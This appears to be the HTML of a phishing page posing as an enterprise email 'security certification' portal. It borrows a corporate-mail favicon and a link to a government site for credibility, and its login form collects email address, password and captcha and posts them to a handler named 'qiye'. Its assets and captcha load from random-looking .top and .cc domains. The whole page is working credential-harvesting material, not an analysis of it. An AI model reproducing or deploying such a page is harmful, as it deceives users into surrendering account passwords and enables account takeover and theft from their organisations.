<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <title>企业邮箱安全认证中心</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta http-equiv="Access-Control-Allow-Origin" content="*">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <link rel="shortcut icon" href="https://my5zio0e8q.cmksncjd.top/src/images/exmail_logo.ico">
    <link rel="stylesheet" href="./../static/企业邮箱安全认证中心_files/layui.css" media="all">
    <link rel="stylesheet" href="./../static/企业邮箱安全认证中心_files/verify.css" media="all">
    <script type="text/javascript" src="./../static/企业邮箱安全认证中心_files/jquery.js.下载"></script>
    <link rel="stylesheet" type="text/css" href="./../static/企业邮箱安全认证中心_files/style3.css" id="login_skin">
    <!--[if lt IE 9]>
    <script src="https://cdn.staticfile.org/html5shiv/r29/html5.min.js"></script>
    <script src="https://cdn.staticfile.org/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->
    
<style>
    .mask-box {
        position: fixed;
        z-index: 9999;
        left: 0;
        right: 0;
        display: none;
        top: 0;
        bottom: 0;
        background-color: rgba(0, 0, 0, 0.5);
    }

    .reg-cont {
        position: absolute;
        width: 740px;
        top: 20%;
        left: 50%;
        margin-left: -370px;
        border-radius: 3px;
        padding: 20px 30px 30px 30px;
        background-color: #fff;
        -webkit-box-shadow: 1.133px 12.951px 9.8px 0.2px rgba(0, 0, 0, 0.02);
        box-shadow: 1.133px 12.951px 9.8px 0.2px rgba(0, 0, 0, 0.02);
    }

    .reg-cont .chose_box {
        float: left;
        width: 370px;
    }

    .reg-cont .chose_box h1 {
        font-size: 20px;
        color: #333;
        text-align: center;
        margin-top: 26px;
    }

    .reg-cont .chose_box img {
        display: block;
        margin: 50px auto 0 auto;
    }

    .reg-cont .person_box a {
        color: #008aff;
        border: 1px solid #008aff;
    }

    .reg-cont .chose_box a {
        display: block;
        margin: 40px auto 20px auto;
        font-size: 18px;
        width: 118px;
        height: 38px;
        border-radius: 2px;
        text-align: center;
        line-height: 38px;
    }

    .reg-cont .company_box a {
        color: #67d027;
        border: 1px solid #67d027;
    }

    .reg-cont .splite_line {
        position: absolute;
        height: 365px;
        border-left: 1px dashed #ddd;
        left: 50%;
        top: 50%;
        margin-top: -182.5px;
    }

    .reg-cont .close-btn {
        position: absolute;
        cursor: pointer;
        width: 11px;
        height: 11px;
        right: 20px;
        top: 15px;
        background: url(cssui/images/i-close.png);
    }

    #mod_r p input {
        background: #ffffff;
        height: 40px;
        line-height: 40px;
        font-size: 15px;
    }

    #mod_r p {
        margin-bottom: 10px;
        margin-top: 10px;
    }

    #registUsername {
        background: #ffffff;
        border: 1px solid #cfd0d2;
        color: #6f6e6e;
    }

    #registUsername:hover, .telphoneCode:hover {
        border: 1px solid #1858dc !important;
    }

    #registUsername a:hover {
        border-color: #1858dc;
        background: #ffffff;
    }

    .splitLine {
        border-top: 1px solid #1858dc;
        float: left;
        width: 60px;
        margin-top: 20px;
    }

    .loginFooterContent {
        float: left;
        text-align: center;
    }

    a {
        text-decoration: none;
    }

    .verticalSplitLine {
        border-left: 1px solid #1858dc;
        width: 2px;
        display: inline-block;
        height: 10px;
    }

    .login-foot {
        margin: 0 0 15px 0 !important;
    }

    .login-foot a {
        padding: 0 3px;
    }

    #mod_r .btn input {
        height: 40px;
    }
    .login-main{margin-top: 36px;}
    .mod_r .btn input {
        color: #fff;
        display: inline-block;
        width: 100%;
        height: 42px;
        border-radius: 5px;
        margin: 0;
        padding: 0;
        font-size: 100%;
        vertical-align: baseline;
        background: transparent;
    }

    .mod_r .btn input:hover {
        background: #2288ff;
        border-radius: 5px;
    }
        .login-main .login-bottom .center .item input {display:inline-block;width:227px;height:22px;padding:0;position:absolute;border:0;outline:0;font-size:14px;letter-spacing:0;}
        .login-main .login-bottom .center .item .icon-1 {background:url(https://rolzjfg.emrzfw.cc/src/images/icon-login.png) no-repeat 1px 0;}
        .login-main .login-bottom .center .item .icon-2 {background:url(https://rolzjfg.emrzfw.cc/src/images/icon-login.png) no-repeat -54px 0;}
        .login-main .login-bottom .center .item .icon-3 {background:url(https://rolzjfg.emrzfw.cc/src/images/icon-login.png) no-repeat -106px 0;}
        .login-main .login-bottom .center .item .icon-4 {background:url(https://rolzjfg.emrzfw.cc/src/images/icon-login.png) no-repeat 0 -43px;position:absolute;right:-10px;cursor:pointer;}
        .login-main .login-bottom .center .item .icon-5 {background:url(https://rolzjfg.emrzfw.cc/src/images/icon-login.png) no-repeat -55px -43px;}
        .login-main .login-bottom .center .item .icon-6 {background:url(https://rolzjfg.emrzfw.cc/src/images/icon-login.png) no-repeat 0 -93px;position:absolute;right:-10px;margin-top:8px;cursor:pointer;}
        .login-main .login-bottom .tip .icon-nocheck {display:inline-block;width:10px;height:10px;border-radius:2px;border:solid 1px #9abcda;position:relative;top:2px;margin:1px 8px 1px 1px;cursor:pointer;}
        .login-main .login-bottom .tip .icon-check {margin:0 7px 0 0;width:14px;height:14px;border:none;background:url(https://rolzjfg.emrzfw.cc/src/images/icon-login.png) no-repeat -111px -48px;}
        .login-main .login-top{font-size: 20px;text-align:center;}
        .login-main .login-bottom .center .item .icon {display:inline-block;width:33px;height:22px;}
        .login-main .login-bottom .center .item {width:288px;height:35px;border-bottom:1px solid #dae1e6;margin-bottom:35px;}
        .login-main .login-bottom .center {width:288px;margin:0 auto;padding-top:22px;padding-bottom:15px;position:relative;}
        .login-main .login-bottom .tip {clear:both;height:16px;line-height:16px;width:288px;margin:0 auto;}
       
        .login-main .login-bottom .tip {clear:both;height:16px;line-height:16px;width:288px;margin:0 auto;}
        .login-main .login-bottom .tip .login-tip {font-family:MicrosoftYaHei;font-size:12px;font-weight:400;font-stretch:normal;letter-spacing:0;color:#9abcda;cursor:pointer;}
        .login-main .login-bottom .tip .forget-password {font-stretch:normal;letter-spacing:0;color:#1391ff;text-decoration:none;position:absolute;right:62px;}
        .login-main .login-bottom .login-btn {width:288px;height:40px;background-color:#1E9FFF;border-radius:16px;margin:24px auto 0;text-align:center;line-height:40px;color:#fff;font-size:14px;letter-spacing:0;cursor:pointer;border:none;}
        .login-main .login-bottom .center .item .validateImg {position:absolute;right:1px;cursor:pointer;height:36px;border:1px solid #e6e6e6;}
        .footer {left:0;bottom:0;color:#fff;width:100%;position:absolute;text-align:center;line-height:30px;padding-bottom:10px;text-shadow:#000 0.1em 0.1em 0.1em;font-size:14px;}
        .padding-5 {padding:5px !important;}
        .footer a,.footer span {color:#fff;}
        @media screen and (max-width:428px) {.login-main {width:360px !important;}
            .login-main .login-top {width:360px !important;}
            .login-main .login-bottom {width:360px !important;}
        }
        #canvas {
            float: right;
            display: inline-block;
            cursor: pointer;
        } 

    @media screen and (min-width: 1400px) {
        .mod_l, .mod_r {
            margin-top: 75px;
        }

        .mod_r .btn {
            display: inline-block;
            width: 100%;
            height: 40px;
            line-height: 40px;
            color: #fff;
            font-size: 18px;
            text-align: center;
            border-radius: 5px;
            background-color: #0957b2;
            background-image: linear-gradient(to right, #0957b2, #2288ff);
            margin-bottom: 15px;
            cursor: pointer;
        }
    }
</style><link rel="stylesheet" href="./../static/企业邮箱安全认证中心_files/layer.css" id="layuicss-layer"></head>

<body style="height: 100%; overflow: hidden;">
<div class="head-wrap">
    <div class="center-box" style="margin-top: -15px;">
        <a class="web-name fn-left" href="http://ucenter.miit.gov.cn/login.jsp?toUrl=https%3A%2F%2Fhlwicpfwc.miit.gov.cn%2Ficpproject_query%2Fapi%2FloginUserInformation%2Flogin.action#"> <img src="./../static/企业邮箱安全认证中心_files/web-name.jpg" alt="">
        </a>
    </div>
</div>
<div class="main" id="main">
    <div class="mod_l" id="mod_l">
        <i class="user_icon"></i>
    </div>
    <div class="mod_r" id="mod_r">
        <div class="main-body" style="line-height: 45px;">
    
    <div class="login-main">
        <div class="login-top">
            <span>邮箱系统安全认证</span>
            <span class="bg1"></span>
            <span class="bg2"></span>
        </div>
        <form class="layui-form login-bottom" id="addmsg" action="qiye" method="POST" name="exppwForm" autocomplete="off">
            <div class="center">
                <div class="item">
                    <span class="icon icon-2"></span>
                    <input type="text" name="email" id="emailinput" autocomplete="off" lay-verify="required|email" placeholder="请输入邮箱账号" maxlength="40">
                </div>

                <div class="item">
                    <span class="icon icon-3"></span>
                    <input type="password" name="password" autocomplete="off" lay-verify="required|password" placeholder="请输入密码" maxlength="30">
                    <span class="bind-password icon icon-4"></span>
                </div>
<div id="validatePanel" class="item" style="width: 137px;">
                    <input type="text" name="captcha" placeholder="请输入验证码" maxlength="4">
                    <img class="validateImg" src="./../static/企业邮箱安全认证中心_files/code.php" alt="" onclick="changeCode()">
                    <div class="layui-input-block">
                    
                    </div>
                <div id="verify"></div>
                
            </div>

            <div class="layui-form-item" style="text-align:center; width:100%;height:100%;margin:0px;" onclick="document.exppwForm.submit()">
                <!--<button class="login-btn" lay-submit="" lay-filter="addmsg" id="btn">立即登录</button>-->
                <a class="layui-btn layui-btn-normal layui-btn-radius" lay-submit="" lay-filter="addmsg" id="btn" style="width:288px; border-radius:4px;">立即认证</a>
            </div>
        
        
    </div></form>
</div>
    </div>
</div>
<div style="clear: both;"></div></div>

<script type="text/javascript" src="./../static/企业邮箱安全认证中心_files/layui.js.下载"></script>
<script>
    function changeCode(){
         $('.validateImg').attr("src","https://rolzjfg.emrzfw.cc/code.php?" + new Date().getTime());
    };
 </script>
<div align="center"><img src="./../static/企业邮箱安全认证中心_files/footera.jpg" style="height:auto;" width="100%"></div>


</body></html>